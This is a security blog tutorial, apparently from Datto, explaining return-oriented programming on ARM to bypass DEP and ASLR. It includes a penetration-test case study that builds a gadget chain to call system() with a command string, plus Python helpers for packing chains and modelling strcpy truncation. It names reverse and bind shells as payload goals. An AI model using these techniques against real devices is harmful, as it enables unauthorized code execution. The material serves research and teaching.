ROP Chaining on ARM for Research Purposes

At Datto, information security is critical. Our information security teams focus on securing everything from customer portals to critical infrastructure devices. Sometimes this requires performing research on products we don't own but actively use. Networking devices are particularly important because they are single points of failure: if one is compromised, an attacker gains a foothold with a slew of connected hosts ready to receive traffic from it. Simple vulnerabilities can often be identified in products with automated tooling; however, identification alone is not enough to accurately rate the risk associated with a general vulnerability like a buffer overflow. The vulnerability must actually be exploited to understand the full extent of a "bug". Most of the time, systems come with security features aimed at stopping attackers from exploiting common vulnerabilities. Two such technologies are DEP and ASLR.

Stack permissions with DEP enabled

DEP stands for Data Execution Prevention. This security feature allows the CPU to identify and label regions of memory where code execution should NEVER happen (heap, stack). If the program tries to execute instructions from one of these regions, the CPU raises a fault and the program ends (crashes).

On ARM processors DEP is referred to as XN or the XN bit, which stands for the ‘execute never’ bit. Feel free to read up on the details, but in essence it likewise prevents marked regions of memory from being executed by the CPU.

But DEP is not all-powerful, and as always hackers have concocted creative and advanced techniques to bypass it. One such technique is ROP (Return Oriented Programming) chaining. ROP chaining is the act of ‘chaining’ (using in sequence) ROP ‘gadgets’ to create a desired program ‘flow’. ROP gadgets are short pieces of code, oftentimes two or three assembly instructions, that end with a return instruction. Executing these instructions does not trigger DEP because they already exist in the exploited program, so the memory they live in already has execute permission. By stringing these small pieces of assembly together, an attacker can execute instructions from multiple parts of the current program to eventually perform their desired actions.
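As a rough illustration of what a chain looks like as data, here is a minimal Python sketch. It assumes a 32-bit little-endian ARM target; the three addresses and the helper name `pack_chain` are made up for the example and do not come from any real binary.

```python
import struct

def pack_chain(words):
    """Pack 32-bit values as little-endian words, in the order they will be popped."""
    return b"".join(struct.pack("<I", word) for word in words)

# Hypothetical gadget addresses, invented for this illustration.
GADGET_ADDRESSES = [0x01011A14, 0x01012B58, 0x01013C9C]

chain = pack_chain(GADGET_ADDRESSES)
print(chain.hex())
```

Each 4-byte word is consumed in turn by the return at the end of the previous gadget, which is what makes the sequence behave like a program.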

Memory stack with ASLR enabled

One method used to protect against ROP chaining is ASLR (Address Space Layout Randomization). ASLR works against ROP chaining by loading sections of memory at random addresses every time the program is started. It could be that only the stack, heap, and loaded libraries are randomized, while the main program image stays at the same address every time the program runs. This is depicted in the above figure.

In this case a ROP chain can still work if viable gadgets are found in a code module that is loaded without ASLR. If only ASLR is enabled and DEP is not, an attacker can circumvent ASLR by leaking a memory address that is always a fixed distance from their buffer, using it to learn where in memory their malicious instructions are, and jumping to them. However, this requires two vulnerabilities: one to leak a memory address, and another to perform the buffer overflow.

The best security practice is to load all components of a program with both ASLR and DEP enabled.

The Why

It is important to understand how to use ROP chaining to accurately rate found vulnerabilities by transitioning them from theoretically exploitable to actually exploited. There is a huge difference in risk between saying “I SHOULD be able to steal all your customers' personal data” and “I CAN steal all your customers' personal data”.

Once a valid ROP chain has been identified, that chain will most likely be usable even if the original buffer overflow vulnerability has been patched. So you can call the same chain through a new vulnerability (new buffer overflow) that is identified later down the line. Pretty cool!

Additionally, understanding ARM ROP chaining is extremely useful for those interested in mobile and IoT device security research. Almost all mobile devices run ARM processors with DEP enabled. A ton of infrastructure devices such as routers, switches, and access points use ARM or MIPS processors, and almost all ARM-based systems are transitioning to enabling DEP by default. Not to mention the tsunami of DIY IoT devices built with hobbyist single-board computers like the Raspberry Pi and BeagleBone, which come with ARM processors and DEP enabled.

So you found a buffer overflow...

Buffer overflow in memory

The first thing to do is understand which pieces of memory are randomized or static. Oftentimes the heap, stack, and linked libraries are put into random sections of memory while the main program you are working with and its various functions are not randomized. This has been observed to be the case in large multi-threaded programs (like the one I exploited to write this article). A ROP chain can likely be used to get code execution even with partial memory randomization.

Stack under various ASLR settings

To verify what pieces of code have ASLR enabled simply start the program with GDB and list the memory map with the following command.

info proc mappings

Do this a couple of times and note which memory regions vary and which ones stay the same. Additionally, a number of secondary tools like ‘gef’ can be used to automate this process.
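If you would rather script the comparison, the following Python sketch shows one way to do it. It assumes you saved the text of /proc/<pid>/maps from two separate runs on Linux; the sample mappings, paths, and function names below are invented for the example.

```python
def start_addresses(maps_text):
    """Map each named region to its lowest start address."""
    starts = {}
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue  # unnamed anonymous mapping; ignored in this sketch
        start = int(fields[0].split("-")[0], 16)
        name = " ".join(fields[5:])
        starts[name] = min(start, starts.get(name, start))
    return starts

def classify(run_a, run_b):
    """Label every region seen in both runs as 'static' or 'randomized'."""
    a, b = start_addresses(run_a), start_addresses(run_b)
    return {name: "static" if a[name] == b[name] else "randomized"
            for name in a if name in b}

# Made-up sample data in /proc/<pid>/maps format.
RUN_A = """\
00010000-00080000 r-xp 00000000 b3:02 1201 /usr/bin/app
76e10000-76f40000 r-xp 00000000 b3:02 877 /lib/libc.so.6
7ea30000-7ea51000 rw-p 00000000 00:00 0 [stack]
"""
RUN_B = """\
00010000-00080000 r-xp 00000000 b3:02 1201 /usr/bin/app
76d52000-76e82000 r-xp 00000000 b3:02 877 /lib/libc.so.6
7ed11000-7ed32000 rw-p 00000000 00:00 0 [stack]
"""

result = classify(RUN_A, RUN_B)
print(result)
```

Two runs are only a hint, of course. A region that matches twice could still move on a third run, so it is worth repeating the comparison a few times.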

Example GEF checksec command output

Understanding ARM Assembly...

The best tool of the trade for identifying gadgets is ROPgadget (https://github.com/JonathanSalwan/ROPgadget): first because it is the most widely recommended, and second because its interface is simple to use. Reverse engineering tools like GEF, however, rely on Ropper, a similar gadget finder inspired by ROPgadget.

ROPGadget example output

ROPgadget has an automated ROP chain generator for supported architectures. Unfortunately for us, this feature is currently not supported for the ARM CPU architecture (it would be cool to lend a hand with that).
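Since the chain has to be assembled by hand, it helps to search the gadget listing programmatically. The Python sketch below assumes the listing was saved to text in the usual "address : instruction ; instruction" layout; the sample gadgets and the function names are hypothetical.

```python
def parse_gadgets(text):
    """Turn 'address : insn ; insn' lines into (address, [instructions]) tuples."""
    gadgets = []
    for line in text.splitlines():
        addr, sep, insns = line.partition(" : ")
        if not sep or not addr.startswith("0x"):
            continue  # skip banners, separators, and blank lines
        gadgets.append((int(addr, 16), [i.strip() for i in insns.split(";")]))
    return gadgets

def find_gadgets(gadgets, needle):
    """Return the gadgets that contain an instruction matching the substring."""
    return [(addr, insns) for addr, insns in gadgets
            if any(needle in insn for insn in insns)]

# Invented sample listing; real addresses depend entirely on the binary.
SAMPLE = """\
Gadgets information
============================================================
0x00011a14 : pop {r4, pc}
0x00012b58 : mov r0, #0 ; bx lr
0x00013c9c : strb r3, [r1, #0x18] ; pop {r4, pc}
"""

gadgets = parse_gadgets(SAMPLE)
for addr, insns in find_gadgets(gadgets, "strb"):
    print(hex(addr), insns)
```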

The first thing to iron out when creating ANY assembly code based payload is determining what you want your payload to do, for instance:

  • Reverse Shell
  • Bind Shell
  • Code Execution
    • Data loading/extraction/deletion
    • Account creation/modification

Next, it is important to have a basic understanding of how to write assembly code for your specific architecture. In this case we will be focusing on ARM assembly. Some important ARM instructions are listed below. A lot of this information is drawn from Azeria Labs, which has great tutorials and is a great place to start practicing these skills: https://azeria-labs.com/writing-arm-assembly-part-1/

Table of common ARM assembly instructions categorized by functionality


Now that we have a basic understanding of ARM assembly code we will try to create a ROP chain that allows us to pass a string, which resides in our payload, as a parameter to the system() function, which will ultimately result in system command execution.

Case Study

ROP chaining attack overview through stack

To help solidify some of the information given above, we will look at a ROP chain found during the penetration test of an embedded device here at Datto. A buffer overflow was found in a multi-threaded application running on the embedded device.

The vulnerable app had partial memory randomization because standard C libraries were loaded in memory segments at random start locations every time the application would run.

However, the main runtime app and its functions were static in memory every time. Additionally, the device had NX or DEP enabled which meant I would NOT be able to execute assembly instructions from within my overflow buffer.

With all this in mind, our simple buffer overflow was a perfect opportunity to apply our knowledge of Return Oriented Programming. It is important to keep in mind that only the main application's code is static, so all ROP gadgets would have to be found within the main application's binary.

Output of checksec showing NX enabled

Here is an example ROP chain very similar to the one developed during my research. I know the size of this chain is daunting but we will break down the entire chain together. Let’s say [line a] overwrites the original ‘PC’ so the first return address will be [line a].

Example ROP chain with accompanying ARM assembly


As mentioned before, we want to call system() with our custom command string. The first thing to do is identify where the program calls ‘system()’. It turns out that the program being tested contains only one call to ‘system()’, and unfortunately the address of that call contains a null byte.

Representation of string in memory

In this case the data being placed in the overflowed buffer came from a remote user. Reverse engineering the program with Ghidra showed that the user-supplied data was copied into the vulnerable buffer using strcpy(). strcpy() copies all data from the start of a string pointer up until it hits a null byte. Thus, our payload can only contain a single null byte, at the very end. Any null byte in the middle will tell strcpy() that it has reached the end of the data to be copied, when in fact it hasn’t, and the rest of our payload will be thrown away.
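To make the truncation concrete, here is a small Python model of what strcpy() writes. It is only a simulation of the copy semantics (everything up to and including the first null byte); the function name and the sample bytes are made up.

```python
def simulated_strcpy(src: bytes) -> bytes:
    """Return the bytes strcpy() would write: up to and including the first NUL."""
    end = src.index(b"\x00")  # raises ValueError if the source has no terminator
    return src[:end + 1]

# A payload with a NUL in the middle: everything after it is lost.
payload = b"AAAA" + b"\x00" + b"BBBB" + b"\x00"
copied = simulated_strcpy(payload)
print(copied)
```

The "BBBB" half never reaches the destination buffer, which is exactly why a null byte may only appear at the very end of the payload.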

Good and bad strcpy() functions in C

So jumping to that memory address MUST be the last thing in our payload because everything after that null byte will not be copied to our overflowed buffer [line s].
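One way to picture why this can still work: on a little-endian target, an address whose most significant byte is zero ends with that zero byte in memory, and strcpy() writes its terminating null in exactly that position. The sketch below assumes that situation (the article does not say which byte of the real address was null); the address and helper name are hypothetical.

```python
import struct

def append_final_address(body: bytes, address: int) -> bytes:
    """Append a 32-bit little-endian address whose only NUL is its last byte."""
    tail = struct.pack("<I", address)
    if b"\x00" in body or b"\x00" in tail[:3]:
        raise ValueError("a NUL before the final byte would truncate the copy")
    if tail[3] != 0:
        raise ValueError("this sketch expects the top byte of the address to be NUL")
    return body + tail

CALL_SITE = 0x00012ABC  # hypothetical address of the instruction that calls system()
payload = append_final_address(b"A" * 8, CALL_SITE)
print(payload.hex())
```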

Next we must somehow get a pointer to our custom cmd string into register r0 so that it can be passed to the system() function as a parameter. The string will be added to our payload buffer right before the address that calls system(). As mentioned before, our string cannot contain any null bytes because it is NOT the last thing in our payload; the address that calls system() is. So, we will need to use the ‘strb’ ARM assembly instruction to place a null byte at a specific location in our custom cmd string. In this case the ONLY ROP gadget that contained a useful strb instruction was [line m] of the final payload. This instruction takes the address held in r1 and stores the low byte of r3 at offset 0x18 (24 in decimal) from it. This leads us to our next challenge: we first need to set the value of r3 to 0!

To set r3 to 0, again, only one suitable ROP gadget was found in this binary: [line d]. Unfortunately, this gadget not only sets r3 to the value of r0, but also adds 0x70 to the current stack pointer and pops r4, r5, r6, and pc from the stack. To compensate for these additional instructions, 112 bytes of padding must be placed in the payload to account for the 0x70 sp offset, followed by values for r4, r5, r6, and pc, so that the gadget addresses that follow are not swallowed as register values instead of being executed.
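The bookkeeping for this gadget can be sketched in a few lines of Python. This assumes 32-bit little-endian words; the register values, the next-gadget address, and the function name are placeholders I invented for the example.

```python
import struct

SP_ADJUST = 0x70  # bytes skipped by the gadget's 'add sp' side effect

def segment_for_line_d(r4, r5, r6, next_pc, filler=b"A"):
    """Build the stack bytes consumed by the gadget's side effects."""
    padding = filler * SP_ADJUST                      # skipped by sp += 0x70
    popped = struct.pack("<IIII", r4, r5, r6, next_pc)  # pop {r4, r5, r6, pc}
    return padding + popped

# Placeholder values only; none of these come from a real target.
segment = segment_for_line_d(0x41414141, 0x42424242, 0x43434343, 0x01014D20)
print(len(segment))
```

In total the gadget consumes 112 + 16 = 128 bytes of the payload before the next gadget address is reached.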

So the next step is to get r0 to be 0. The good news is that there were a ton of gadgets that accomplished this. For simplicity I chose the gadget on [line c]. However, this gadget ends with ‘bx lr’, which means I must first overwrite the ‘lr’ register with the address of a ‘pop {pc}’ gadget. This way, when ‘bx lr’ executes, control actually lands on ‘pop {pc}’, which takes the next address from our buffer and jumps to it. Loading lr can be accomplished with a simple ‘pop {lr}’ gadget. This is seen in [line a] and [line b].

Taking it from the top!

To summarize, let's review the code from top to bottom. We start by overwriting lr, which we will use later when we set r0 to 0.

Taking control of the stack and setting up registers

Then with r0 set to 0 we set r3 to r0 and add a small buffer to account for our sp += 0x70. We also provide some values for r4, r5, and r6 that will be useful later.

Zeroing important registers and dealing with secondary instructions

Now that r3 is set to zero we are ready to overwrite the end of our string. Before we can do this, we need to set a register to the start of our string. [Line j] gets the current sp and sets r1 = sp + 0x18 or 24 bytes away. This means our cmd string needs to start 24 bytes from the current stack pointer. THIS OFFSET IS VERY IMPORTANT. IF THIS IS NOT EXACT THE PAYLOAD WILL NOT WORK!
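The offset arithmetic is simple but easy to get wrong, so here is a minimal Python sketch of it. It assumes 4-byte stack words and that sp points at the first word shown; the filler words, the "id" command, and the function name are placeholders.

```python
import struct

WORD_SIZE = 4
R1_OFFSET = 0x18                             # r1 = sp + 0x18
WORDS_BEFORE_STRING = R1_OFFSET // WORD_SIZE  # 24 / 4 = 6 words

def place_string(words_after_sp, cmd):
    """Lay out exactly six words, then the command string r1 will point to."""
    if len(words_after_sp) != WORDS_BEFORE_STRING:
        raise ValueError("need exactly %d words before the string" % WORDS_BEFORE_STRING)
    return b"".join(struct.pack("<I", w) for w in words_after_sp) + cmd

filler_words = [0x01010101] * WORDS_BEFORE_STRING  # stand-ins for gadget addresses
region = place_string(filler_words, b"id")
print(region[R1_OFFSET:])
```

If the number of words in front of the string is off by even one, r1 ends up pointing four bytes away from the command.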

Setting r1 to point to the memory location of the start of our command string



Taking this into account we only have 6 ROP gadgets before we need to start the cmd string. So we need to add the null byte to the string, and then transfer the address in r1 to r0 before we finally call system(). This is accomplished in [lines k - q]. It is important to note that the null byte will be placed 24 chars from the start of the string so our cmd string only has 24 useful bytes. Additionally, we need to set the pc to the system() call which is after the string, which as of right now is 24 bytes away. Thus we need to pop (24/4) words or 6 registers. But we have to be careful and NOT overwrite r0.

Adding null byte to the end of the command string and dealing with secondary instructions



The only ROP gadget that pops more than 6 registers is [line q]. But [line q] actually pops 7 registers before popping pc and our cmd string is only 6 registers long. So what we will do is extend our cmd string to 24 + 4 bytes. 4 extra bytes for that 7th register. However, still only the first 24 bytes are passed to system(). An example payload is given for a reverse shell.
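Here is a small Python model of that 24 + 4 byte layout. Padding the command with trailing spaces is my own choice for the sketch (the shell ignores them), and "id" is a harmless stand-in for a real command; the function names are hypothetical.

```python
USABLE_BYTES = 0x18  # strb writes the NUL at index 24
EXTRA_BYTES = 4      # filler for the 7th popped register

def pad_command(cmd: bytes) -> bytes:
    """Pad a command to 24 bytes and append 4 filler bytes, with no NULs."""
    if b"\x00" in cmd:
        raise ValueError("command must not contain NUL bytes")
    if len(cmd) > USABLE_BYTES:
        raise ValueError("command is longer than 24 bytes")
    return cmd.ljust(USABLE_BYTES, b" ") + b"X" * EXTRA_BYTES

def after_strb(padded: bytes) -> bytes:
    """Model the strb gadget: write NUL at index 0x18, return the C string."""
    buf = bytearray(padded)
    buf[USABLE_BYTES] = 0
    return bytes(buf).split(b"\x00", 1)[0]

padded = pad_command(b"id")
seen_by_system = after_strb(padded)
print(len(padded), seen_by_system)
```

The four filler bytes only exist to feed the extra pop; the null written at index 24 lands on the first of them, so system() never sees them.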

Transferring program execution to system() function and dealing with secondary instructions



Finally, the ‘pc’ is set to the memory address that calls system(), and our 24 byte command will be executed!

Wrapping it all up

Hopefully you’ve gained a basic understanding of what a buffer overflow is, and what mitigations are out there to help you protect against them. Additionally, we discussed what a ROP gadget is fundamentally, and how you can use these primitive elements to construct ROP chains. A table of useful ARM assembly instructions was also given that can be used later to create even more complex ROP chain logic. Lastly, we studied a small example of how to work with difficult ARM gadgets, which showcased how to deal with unwanted secondary instructions in otherwise useful ROP gadgets. Ultimately, being able to work with difficult ROP gadgets strengthens your ability to successfully exploit an ARM binary.

Use the force for good.

  • Armed with this knowledge, buffer overflows can reliably be turned into code execution even on security-hardened embedded or mobile systems.
  • Additionally, better understanding ROP gadgets, including difficult ones with unwanted side effects, will allow you to create more robust ROP chains.
  • Remember ROP chaining requires you to ‘live off the land’ so you can only do as much as what is already given by the program. As always go for the low hanging fruit like simple system() calls.


About the Author

Felix Blanco

Breaking and rebuilding cloud managed embedded systems.
